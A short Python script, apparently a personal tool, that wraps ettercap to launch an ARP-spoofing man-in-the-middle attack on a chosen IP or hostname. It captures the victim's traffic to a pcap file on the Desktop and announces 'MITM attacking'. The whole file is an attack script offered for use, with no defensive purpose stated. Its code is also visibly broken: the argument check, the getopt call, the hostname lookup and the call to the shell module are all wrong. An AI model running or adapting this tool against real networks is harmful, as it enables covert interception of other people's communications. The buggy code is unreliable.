#!/usr/local/bin/python

# requires:
#   ettercap ('brew install ettercap')
#   shell ('pip install shell')

# usage:
#   'mitm {ip}'
# or
#   'mitm -h {host}'

import shell
import sys
import socket
from getopt import getopt

if len(sys.argv) == 0:
    print ("Usage: mitm [IP] or mitm -h [HOSTNAME]")
    exit(0)

(options, addr) = getopt(sys.argv, "-h")

print options

if options:
    # lookup the hostname
    ip = socket.gethostbyaddr(addr)[0]
else:
    ip = addr

print ("MITM attacking {}. Stand by...".format(addr))

shell('sudo ettercap -i en1 -T -w ~/Desktop/ettercap.pcap -M ARP /{}/ // output:'.format(ip))
